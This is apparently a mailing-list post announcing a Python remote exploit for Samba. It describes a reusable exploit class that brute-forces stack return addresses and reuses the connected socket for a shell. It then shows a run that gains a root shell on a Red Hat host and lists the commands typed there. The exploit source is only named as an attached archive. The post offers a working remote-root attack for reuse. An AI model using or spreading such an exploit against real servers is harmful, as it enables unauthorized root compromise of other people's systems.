0day is fragile! one day it's your precious, next day its worthless ... anyways i put together this SAMBAExploit class in python which might be interesting for folks since it's reusable in many other stuff ... python cause; write once a heap, stack or fmt string exploit class and the rest is just to "cp old_exp.py new_exp.py; vi new_exp.py" exploit bruteforces all possible stack range and dups the already connected socket for spawning the shell greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode - noir noir@juneof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132 [*] brute forcing well known addr range ... [*] trying; retaddr: 0xbffed404 trying; retaddr: 0xbffed504 trying; retaddr: 0xbffed604 trying; retaddr: 0xbffed704 Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown cat /etc/redhat-rel* Red Hat Linux Advanced Server release 2.1AS (Pensacola) id uid=0(root) gid=0(root) groups=99(nobody) exit *** Connection closed by remote host ***
Attachment:
samba_exp2.tar.gz
Description: application/gunzip
